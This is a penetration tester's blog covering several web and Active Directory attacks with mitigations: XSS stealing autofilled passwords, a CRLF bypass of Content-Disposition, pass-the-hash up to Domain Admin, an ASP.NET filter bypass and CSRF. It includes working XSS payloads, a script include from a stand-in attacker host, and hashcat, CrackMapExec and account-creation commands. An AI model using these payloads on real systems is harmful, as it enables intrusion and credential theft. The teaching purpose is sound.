Therefore, the browser storing the password for the use of the user, is of very little risk. The main risk here, is what the Burp description of the vulnerability touches upon above:

cross-site scripting [XSS] may be able to exploit this to retrieve a user’s browser-stored credentials.

Yikes! So XSS could grab the credentials from your browser. To find out whether your browser is vulnerable, I’ve setup a test.

Login to your password manager, click the following link and then enter username: admin and password: secretPassword and when your browser asks you to save your password, do it. Go!

Then try the next link preloaded with this juicy XSS payload

<script>
document.body.onload=setTimeout(
function() {
    alert(document.getElementById('password').value)
    }
    ,1000)
</script>

The one second delay is to give the browser time to complete the form. However, this can be altered with the delay parameter in case your browser needs longer.

Test

So if an alert box is shown with your password, your browser or password manager is vulnerable. In a real attack there will be no alert box, the attacker sends the password (and of course, username using the same method) cross-domain to their site like this (open dev tools or Burp to see the background request).

The next link has autocomplete off. There are two tests you can do here.

  1. Find out whether your password is still completed from before. Many modern browsers ignore the autocomplete directive.
  2. Don’t do this test yet, but if you try a new login (e.g. root and pass), see whether your browser prompts you to save.

Autocomplete Off

The second test may prevent your browser from auto-filling anything in future on this domain without you manually clicking (as you now have two possible logins to the site). Delete one of the logins from your browser/manager if you tried this test.

If your browser still autocompletes, this shows that setting autocomplete=off is pretty pointless for users with the same browser and password manager combination.

Attacker Injected Form

If autocomplete=off made a difference to the above, then the point of my post is to show you whether an attacker injected form could re-enable autocomplete and then capture your credentials, should a cross-site scripting vulnerability exist on the site, and that you were unlucky enough to follow an attacker controlled link.

Before starting, make sure you only have one login saved. See the following guide on how to delete passwords if you tried the second test above. Click this link then your browser version and click back to return to this site: How to delete passwords.

This one has autocomplete off, however, an attacker injects their own form tag via the XSS vector, with autocomplete on to try and grab the password from it:

Attacker Injected Form

This works by closing the original form in the HTML, and then opening another one without autocomplete disabled before injecting the script:

</form><form><script...

If this test worked, but the second test didn’t, then removing autocomplete from a form is like closing the stable door after the horse has bolted. The password has already been saved and any future XSS attacks can grab their password.

Firefox 61, Edge 42 and IE 11 appear to be vulnerable, so if you have cross-site scripting on your site and a user has saved passwords, then the attacker can trivially grab the login details should their XSS link be followed. Chrome 67 appears to pre-fill the password, however, the script alert is empty, suggesting that Chrome has some clever logic built-in preventing script from retrieving it. I wonder if there’s a way around this for an attacker…? Maybe an idea for a future post.

The solution to this would be to use a password manager that requires the user to click before completing the password. This would stop a cross-site scripting attack from sending the password to the user automatically. Of course, if the user proceeded to login, the cross-site scripting could have attached an event handler to the password field in order to send once it had been entered. Changing your password manager will guard against completely automated attacks that do not require further user interaction.

So to avoid being a victim yourself:

  • If the “attacker injected form” test gets your password, switch to a password manager that requires you to click before completing your login details.
  • For sensitive sites, bookmark the logon page and always follow your bookmark when logging in, never follow links from emails, other sites or from messages.

From a pentesting perspective it looks like we’re stuck reporting it, especially for PCI tests:

there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.

So to sum up, password managers are great and increase overall security. However, if they complete forms without asking, they make an attacker’s work easy.

Defeating Content-Disposition

16 April 2018 at 23:00

The Content-Disposition response header tells the browser to download a file rather than displaying it in the browser window.

Content-Disposition: attachment; filename="filename.jpg"

For example, even though this HTML outputs <script>alert(document.domain)</script>, because of the header telling the browser to download, it means that no Same Origin Policy bypass is achieved:

Save As

This is a great mitigation for cross-site scripting where users are allowed to upload their own files to the system. HTML files are the greatest threat, a user uploading an HTML file containing script can instantly refer others to the download link. If the browser does not force the content to download, the script will execute in the context of the download URL’s domain, giving the uploader access to the client-side of the victim’s session (the one that clicked the link). Of course, you could serve any downloads from another domain, however, if only authorised users should have access to the file then this means implementing some cross-domain authentication system, which could be prone to security flaws in its own right. Note that ideally (from the attacker’s perspective), any uploads should be able to be downloaded by other users, or should at least be shareable, otherwise we are only in self-XSS territory here, which in my opinion is a non-vuln.

As well as the obvious HTML, there are also ways to bypass the SOP by uploading Flash or a PDF and then embedding the upload on the attacker’s page.

So… can Content-Disposition be bypassed? There were a few old methods that relies on either Internet Explorer caching bugs or Firefox bugs:

(Links stolen from here.)

Well on a pentest some time ago, I found another way. Admittedly, this was unique to the application, however, I’m sure it will not be the only one vulnerable in this way.

The application in question included a page designer, and the page designer widget allowed images to be uploaded to be included in the page. Upload functionality can be a gold mine for pentesters, so I immediately got testing it. Unfortunately, trying to upload a file of type text/html gave a 400 Bad Request. In fact, trying to upload anything except images gave the same response. Even when the client gave me access to the source code, I validated it and the code appeared sound - only allowing uploads of a white-list of allowed types.

If a file was uploaded, it was downloaded by the browser in a response that included the content-disposition header:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:19:25 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: image/png
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=foobar.png
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, what the client appeared to have forgotten was that there was a back-end API service, and that normal users could authenticate to this service by passing in their app username and password into a basic auth header.

This header is a request header and is in the following format:

Authorization: <type> <credentials>

In the basic mode this is:

Authorization: basic base64(username:password)

So to demonstrate, you can use an online tool such as this one. If your username is foo and your password is bar you would pass in the following header:

Authorization: basic Zm9vOmJhcg=

This is foo:bar base64’d.

Passing this to the API, which was publicly available but ran on port 8875, allowed access to its functions as the authenticated user.

The first flaw I found is that the API allowed any content-type to be uploaded, even those that were disallowed if using the web UI:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg=
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html"}

Obviously, this is simplified and anonymised from the original app. Anyway, this gave the following HTTP response:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788421"}

Requesting the file actually returned the content-type:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:24:11 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, that pesky content-disposition was preventing us from gaining XSS.

What I next tried was setting the type to text/html\r\n\foo:bar, thinking that this would not work. However, it uploaded fine and upon requesting the download I got the injected header returned:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:44:35 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
foo:bar
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Interesting… My first go at bypassing content-dispostion was to inject another content-disposition header, hoping the browser would act on the first one:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:45:52 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
content-disposition: inline
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, the browser flagged this with the following error, which I’ve never seen the likes of before:

Duplicate Content-Disposition

After a bit of thought, I came up with the following payload instead:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg=
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html\r\n\r\n"}

This gave me the ID as before:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788444"}

And requesting

https://10.10.65.26/en-GB/files/10000006788444/download

gave the XSS:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 17:34:21 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html

Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Alert

This is due to the injected carriage-return and linefeed which causes the browser to interpret the second, original, content-disposition header as part of the HTTP body, and therefore ignored as a directive to tell the browser to download. Of course, this does need some social engineering as you would require your victim to follow the link to the downloaded file to trigger the JavaScript in their login context.

Gaining Domain Admin from Outside Active Directory

4 March 2018 at 11:06

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, Active Directory testing has become my favourite type of penetration test.

This post is regarding an internal network test I undertook some years back. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time.

The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open.

So I ran Responder, and I was surprised to see the following hash captured:

reponder

Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK.

Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can check whether this is a local account hash. If it is, the “domain” part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches:

netbios

So the next port of call we try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password.

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

hashcat

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

admin on own machine

We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

SAM hashes

Note we can see

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM.

The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”:

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

admin password reuse

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead).

To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info:

$ cme smb 172.16.157.134 
SMB         172.16.157.134  445    STEWIE           
[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)
(signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory.

So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM as the password which will cause Metasploit to pass-the-hash.

metasploit options

Once ran, our shell is gained:

ps exec shell

We can load the Mimikatz module and read Windows memory to find passwords:

mimikatz

Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC, in real life or to remain more stealthy we could just use the discovered account).

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

add da

Note the use of the undocumented /y function to suppress the prompt Windows gives you for adding a password longer than 14 characters.

A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation:

da proof

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).

How to Use X-XSS-Protection for Evil

10 February 2018 at 19:33

Two important headers that can mitigate XSS are:

  • X-XSS-Protection
  • Content-Security-Policy

So what is the difference?

Well browsers such as Internet Explorer and Chrome include an “XSS auditor” which attempts to help prevent reflected XSS from firing. The first header controls that within the browser.

Details are here, but basically the four supported options are:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

It should be noted that the auditor is active by default, unless the user (or their administrator) has disabled it.

Therefore,

X-XSS-Protection: 1

will turn it back on for the user.

The second header, Content Security Policy, is a newer header that controls where an HTML page can load its content from, including JavaScript. Basically including anything other than unsafe-inline as a directive means that injected JavaScript into the page will not execute, and can mitigate both reflected and stored XSS. CSP is a much larger topic than I’m going to cover here, however, detailed information regarding the header can be found here.

What I wanted to show you was the difference between specifying block, and either not including the header at all (which therefore will take on the setting in the browser) or specifying 1 without block. Also, for good measure I will show you the Content Security Policy mitigation for cross-site scripting.

I will show you a way that if a site has specified X-XSS-Protection without block, how this can be abused.

The linked page has the following code in it:

<script>document.write("one potato")</script><br />
<script>document.write("two potato")</script><br />
three potato

Now if we link straight there from the current page you’re reading, the two script blocks should fire:

normal

To demonstrate how the XSS auditors work, let’s imagine we tried to inject that script into the page ourselves by appending this query string:

?xss1=<script>document.write("one potato")</script>&xss2=<script>document.write("two potato")</script>

Note that the following will not work from Firefox, as at the time of writing Firefox doesn’t include any XSS auditor and therefore is very open to reflected XSS should the visited site be vulnerable. There is the add-on noscript that you can use to protect yourself, should Firefox be your browser of choice. Note the following has been tested in Chrome 64 only. I will also enable your XSS filter in supported browsers by adding X-XSS-Protection: 1 to the output.

injected

Note how the browser now thinks that the two script blocks have been injected, and therefore blocks them and only outputs the plain HTML. View source to see the code if you don’t believe it is still there.

Viewing F12 developer tools shows us the auditor has done its stuff:

Chrome F12

Viewing source shows us which script has been blocked in red:

Source code

Now what could an attacker do to abuse the XSS auditor? Well they could manipulate the page to prevent scripts of their choosing to be blocked.

?xss2=<script>document.write("two potato")</script>

abused

Viewing the source shows the attacker has just blocked what they wanted by specifying the source code in the URl:

abused source code

Of course, editing their own link is fruitless, they would have to be passing the link onto their victim(s) in some way by sending it to via email, Facebook, Skype, etc …

What are the risks in this? Well The Web Application Hacker’s Handbook puts it better than I could:

web app hackers handbook quote

So, how can we defend against this? Well, you guessed it, the block directive:

X-XSS-Protection: 1; mode=block

So let’s try this again with that specified:

abused but blocked

So by specifying block we can prevent an attacker from crafting links that neutralise our existing script!

So in summary it is always good to specify block as by default XSS auditors only attempt to block what they think is being injected, which might not actually be the evil script itself.

Content Security Policy then?

Just to demo the difference, if we output a CSP header that prevents inline script and don’t attempt to inject anything:

CSP example image

Chrome shows us this is solely down to Content Security Policy:

csp chrome error

To get round this as site developers we can either specify the SHA-256 hash as described in our CSP, or simply move our code to a separate .js file as long as we white-list self in our policy. Any attacker injecting inline script will be foiled. Of course the problem with Content Security Policy is that it still seems to be an after-thought and trying to come up with a policy that fits an existing site is very hard unless your site is pretty much static. However, it is a great mitigation if done properly. Any weaknesses in the policy though may be ripe for exploitation. Hopefully I’ll have a post on that in the future if I come across it in any engagements.

*Yeh yeh, you’re not using X-XSS-Protection for evil, but lack of block of course, and if no-one has messed with the browser settings it is as though X-XSS-Protection: 1 has been output.

Hidden XSS

3 February 2018 at 15:16

On a web test once I was having trouble finding any instances of cross-site scripting, which is very unusual.

However, after scanning the site with nikto, some interesting things came up:

$ nikto -h rob-sec-1.com
- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          193.70.91.5
+ Target Hostname:    rob-sec-1.com
+ Target Port:        80
+ Start Time:         2018-02-03 15:37:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie v created without the httponly flag
+ Root page / redirects to: /?node_id=V0lMTCB5b3UgYmUgcmlja3JvbGxlZD8%3D
+ Server leaks inodes via ETags, header found with file /css, inode: 0x109c8, size: 0x56, mtime: 0x543795d00f180;56450719f9b80
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /css: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 4197 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-02-03 15:40:15 (GMT0) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularly this:

+ OSVDB-3092: /test/: This might be interesting...

So I navigated to /test/ and saw this at the top of the page:

Test URL in browser

So the page had the usual content, however, there appeared to be some odd text at the top, and because it said NULL this struck me as some debug output that the developers had left in on the production site.

So to find out if this debug output is populated by any query string parameter, we can use wfuzz.

First we need to determine how many bytes come back from the page on a normal request:

$curl 'http://rob-sec-1.com/test/?' 1>/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   289

Here we can see that this is 53. From there, we can configure wfuzz to try different parameter names and then look for any responses that have a size other than 53 characters. Here we’ll use dirb’s common.txt list as a starting point:

$ wfuzz -w /usr/share/wordlists/dirb/common.txt --hh 53 'http://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>'
********************************************************
* Wfuzz 2.2.3 - The Web Fuzzer                         *
********************************************************

Target: HTTP://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>
Total requests: 4614

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

02127:  C=200      9 L	       8 W	     84 Ch	  "item"

Total time: 14.93025
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 309.0369

Well, whaddya know, looks like we’ve found the parameter!

Copying /test/?item=<script>alert("xss")</script> into Firefox gives us our alert:

xss

ASP.NET Request Validation Bypass

14 October 2017 at 17:49

…and why you should report it (maybe).

This post is regarding the .NET Request Validation vulnerability, as described here. Note that this is nothing new, but I am still finding the issue prevalent on .NET sites in 2017.

Request Validation is an ASP.NET input filter.

This is designed to protect applications against XSS, even though Microsoft themselves state that it is not secure:

Even if you’re using request validation, you should HTML-encode text that you get from users before you display it on a page.

To me, that seems a bit mad. If you are providing users of your framework with functionality that mitigates XSS, why do users then have to do the one thing that mitigates XSS themselves?

Microsoft should have ensured that all .NET controls properly output things HTML encoded. For example, unless the developer manually output encodes the data in the following example then XSS will be introduced.

<asp:Repeater ID="Repeater2" runat="server">
  <ItemTemplate>
    <%# Eval("YourField") %>
  </ItemTemplate>
</asp:Repeater>

The <%: syntax introduced in .NET 4 was a good move for automatic HTML encoding, although it should have existed from the start.

Now to summarise, normally ASP.NET Request Validation blocks any HTTP request that appears to contain tags. e.g.

example.com/?foo=<b> would result in A potentially dangerous Request.QueryString value was detected from the client error, presented on a nice Yellow Screen of Death.

This is to prevent a user from inserting a <script> tag into user input, or from trying some other form such as <svg onload="alert(1)" />.

However, the flaw in this is that <%tag is allowed. This is a quirky tag that only works in Internet Explorer 9. But ironically not quirks mode, it requires IE9 standards mode so the top of the page must contain this Edit: It works in either mode, however if the page is in quirks mode then it requires user interaction (like mouseover). Example, the existing page can seen to be in quirks mode as it contains the following type definition and meta tag (although in tests only the meta tag seems to be required):

<!doctype html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

I’ve setup an example here that you can try in IE9. The code is as follows:

<!doctype html>
<html>
<head>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge">
</head>
<body>

	<%tag onmouseover="alert('markitzeroday.com')">Move mouse here

</body>
</html>

Loading your target page in Internet Explorer 9 and then viewing developer tools will show you whether the page is rendered in quirks mode.

Moving the mouse over the text gives our favourite notification from a computer ever - that which proves JavaScript execution has taken place:

XSS Proof

Edit: Actually this does work in quirks mode too using a CSS vector and no document type declaration:

<html>
<head>
</head>
<body>

        <%tag style="xss:expression(alert('markitzeroday.com'))">And you don't even have to mouseover

</body>
</html>

Example Warning: This is a trap, and you may need to hold escape to well… escape.

Now, you should report this in your pentest or bug bounty reports if you can prove JavaScript execution in IE9, either stored or reflected. Unfortunately it is not enough to bypass Request Validation in itself as XSS is an output vulnerability, not an input one.

Note that it is important that this is reported, even though it affects Internet Explorer 9 only. The reasons are as follows:

  • Some organisations are “stuck” on old versions of Internet Explorer for compatibility reasons. Their IT department will not upgrade the browsers network wide as a piece of software bought in 2011 for £150,000 will not run on anything else.
  • By getting XSS with one browser version, you are proving that adequate output encoding is not in place. This shows the application is vulnerable should it also use data from other sources. e.g. User input from a database shared with a non ASP.NET app, or an app that is written properly as not to rely on ASP.NET Request Validation.
    • Granted you can only test inputs from your “in-scope” applications and prove that those inputs have a vulnerable sink when output elsewhere, although chances are that if one part of the application is vulnerable then other parts will be and you can alert your client to this possibility quite literally.

Note also that Request Validation inhibits functionality. Much like my post on functional flaws vs security flaws, preventing a user from entering certain characters and then resolving this by issuing an HTTP 500 response results in a broken app. If such character sequences are not allowed, you should alert the user in a friendly way and give them chance to fix it first, even if this is only client-side validation. Also any automated processes that may include <stuff that it POSTs or GETs to your application may unexpectedly fail.

The thing that Microsoft got wrong with Request Validation is that XSS it an output problem, not an input problem. The Microsoft article linked above is still confused about this:

If you disable request validation, you must check the user input yourself for dangerous HTML or JavaScript.

Of course, if you want a highly secure site as your risk appetite is low, then do validate user input. Don’t let non alphanumeric characters be entered if they are not needed. However, the primary mitigation for XSS is output encoding. This is the act of changing characters like < to &lt;. Then it doesn’t matter if this is output to your page as the browser won’t execute it and therefore no XSS.

So as a pentester, report it if IE9 shows the alert, even if IE9 should be killed with fire. As a developer, turn Request Validation off and develop your application to HTML encode everywhere (don’t output into JavaScript directly - just don’t). If you need “extra” security, prevent non alphanumerics from being inserted into fields yourself through server-side validation.

XSS Without Dots

26 July 2017 at 20:02

A site that I discovered was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

<div>
monkey => banana
</div>

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave

<div>
<script>alert(1)</script>
</div>

So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave

<div>
<script>alert(document_cookie)</script>
</div>

Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:

<div>
<script>alert(document[
</div>

So thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:

<div>
<script_src="//attacker-site_co_uk/sc_js"></script>
</div>

Doh! Two problems….

A quick Google gave the answer to use %0C for the space:

example.php?<script%0Csrc="//attacker-site.co.uk/sc.js"></script>

And then to get the dots, we can simply HTML encode them as we are in an HTML context:

example.php?<script%0Csrc="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which percent encoded is of course

example.php?<script%0Csrc="//attacker-site%26%2346%3bco%26%2346%3buk/sc%26%2346%3bjs"></script>

And this delivered the goods:

<div>
<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>
</div>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box:

Alert

CSRF Mitigation for AJAX Requests

29 June 2017 at 11:34

To start with, a quick recap on what Cross-Site Request Forgery is:

  1. User is logged into their bank’s website: https://example.com.
  2. The bank website has a “money transfer” function: https://example.com/manage_money/transfer.do.
  3. The “money transfer” function accepts the following POST parameters: toAccount and amount.
  4. While logged into https://example.com the user receives an email from a person they think is their friend.
  5. The user clicks the link inside the email to access a cat video: https://attacker-site.co.uk/cats.htm.
  6. cats.htm whilst displaying said cat video, also makes a client-side AJAX request to https://example.com/manage_money/transfer.do POSTing the values toAccount=1234 and amount=100 transferring £100 to the attacker’s account from the victim.

Quick POC here that only POSTs to example.com and not your bank. Hopefully your bank already has CSRF mitigation in place. View source, developer console and Burp or Fiddler are your friends.

There’s a common misconception that websites can’t make cross-domain requests to other domains due to the Same Origin Policy. This could be due to the following being displayed within the browser console:

CORS Error

However, this is not the case. The request has been made, the browser message is telling you that the current origin (https://attacker-site.co.uk) simply cannot read any of the returned data from the cross-domain request. However, unlike an XSS attack, it doesn’t need to. The request has been made, and because the user is logged into the bank so therefore has a session cookie, this session cookie has been passed to the bank site authorising the transaction.

Quick Demo

Simulate the bank issuing a session cookie by creating our own in the browser:

Cookie Setup

Note we’ll set the Secure flag and HTTPOnly flags to show these have no effect on CSRF.

Visit the website:

Attacker Site CATS!

The following request is sent, note our session cookie is included:

Burp Request

Therefore as far as the web application is concerned, this is a legitimate request from the user to transfer the money despite the browser returning Cross-Origin Request Blocked. Only the response is blocked, not the original request.

AJAX Mitigation

If the target application has no CSRF mitigation in place, the above works for both AJAX requests and traditional form POSTs. This can be mitigated using the traditionally recommended Synchronizer Token Pattern. This involves creating a random, unpredictable token (in addition to the session token held in the cookie) and storing this server-side as a session variable. When a POST is made, this anti-CSRF token is also sent, but using any mechanism apart from cookies. This means that the anti-CSRF token will not be automatically included from the browser should the user follow a dodgy link that makes its own cross-domain request. CSRF averted.

But what if there was another way? One little known way is to include a custom header, such as X-Requested-With, as I answered here.

Basically:

  1. Set the custom header in every AJAX request that changes server-side state of the application. e.g. X-Requested-With: XmlHttpRequest.
  2. In each server-side method handler, ensure a CSRF check function is called.
  3. The CSRF function examines the HTTP request and checks that X-Requested-With: XmlHttpRequest is present as a header.
  4. If it is, it is allowed. If it isn’t, send an HTTP 403 response and log this server-side.

Many JavaScript frameworks such as JQuery will automatically send this header along with any AJAX requests. This header cannot be sent cross-domain:

  1. Any attempt to do so with a modern browser will trigger a CORS preflight request.
  2. Older browsers (think IE 8 and 9) can send cross-domain requests, but custom headers are not supported at all.
  3. Very old browsers cannot send cross-domain AJAX requests at all.

What is a Preflight?

So referring to the above old browsers couldn’t make cross-domain requests at all via AJAX. Therefore, you may get an old website that does check for a custom header server-side so that it knows it is an AJAX request. Now, the web is developed on the basis of “no breaking changes”. Therefore any new technologies introduced into the browser should not force websites to have to update themselves to continue working (why not visit the World Wide Web - apparently the world’s first website). This goes for functionality as well as security.

Therefore, suddenly allowing browsers to send cross-domain headers could break security if a site relies on this for CSRF mitigation. This scenario covers both points 2 and 3.

So that leaves 1, CORS (Cross-Origin Resource Sharing). CORS is a mechanism that weakens security. Its aim is to allow sites that trust one another to break the Same Origin Policy and read each others responses. e.g. api.example.org might allow example.org to make a cross-domain request and read the response in the browser, using the user’s session cookie as authorisation.

In a nutshell CORS does not prevent anything that used to be possible from happening. An example is a cross domain post using <form method="post"> has always been allowed, so therefore CORS allows any AJAX request that results in a previously possible HTTP request to be made, without a preflight request. This is because this has always been possible on the web and allowing AJAX to do this as well does not introduce any extra risk. However, a request with custom headers causes the browser to automatically send a request to the endpoint using the OPTIONS verb. If the server-side application recognises the OPTIONS request (i.e. it is CORS aware), it will reply with a header showing which headers will be allowed from the calling domain.

Here you can see the attempt to send X-Requested-With in a cross-domain POST results in an OPTIONS request requesting this header be allowed, rather than the actual request. This is the preflight.

OPTIONS verb

If the server-side is not explicitly configured to allow this (i.e. no Access-Control-Allow-Origin to allow the domain and no Access-Control-Allow-Headers to allow the custom header):

OPTIONS response

The header is not allowed because our example.com domain is not configured for CORS.

Therefore if CORS is not allowing the attacker’s domain to send extra headers, this mitigates CSRF.

Will This Work?

What To Look For When Pentesting

The above will only work if the server-side application is verifying that the custom header X-Requested-With is received in the request. As a pentester you should verify that all potentially discovered CSRF vulnerabilities are actually exploitable. Burp Suite allows this via right clicking an item then clicking Engagement tools > Create CSRF PoC. This may result in two things:

  1. If you weren’t aware of the above, you may find a POST request that first appeared vulnerable to CSRF (due to no tokens) however isn’t due to header checking.
  2. If, after having read this post, you find that an AJAX request is sending X-Requested-With: XmlHttpRequest you may find that removing this header still causes the “unsafe” action to take place server-side, therefore the request is vulnerable.

What To Do As A Developer

This may be a good short-cut if your server-side language of choice does not support server-side variables or if you do not want the extra overhead of storing an additional token per user session. However, make sure that the presence of the HTTP request header is verified for every handler that makes a change of state to your application. Aka, “unsafe” requests as defined by the RFC.

Remember, this only works for AJAX requests. If your application has to fall-back to full HTML requests if JavaScript is disabled, then this will not work for you. Custom headers cannot be sent via <form> tags.

Conclusion

This is a useful, easy to implement mitigation for CSRF. Although an attacker can easily add a custom header themselves (e.g. using Burp Suite), they can only do this to their own requests, not those of the victim as required in a client-side attack. There were vulnerabilities in Flash that allowed a custom-header to be added to a cross-domain request to another attacker’s site that set crossdomain.xml. Unlike HTML, Flash requires a crossdomain.xml file for any request, even those that are write only, such as CSRF. The trick here was for the attacker to issue a 307 HTTP redirect to redirect from their second attacker domain to the victim website. The bug in Flash carried over the custom header from the original request. However, as Flash is moribund, and this was a bug, I would say it is generally safe for most sites to rely on the presence of the header as a mitigation. However, if the risk appetite is low for the application in question, go with token mitigation instead of or as well: Defence-In-Depth.

Note that the Flash bug was fixed back in 2015.

❌
❌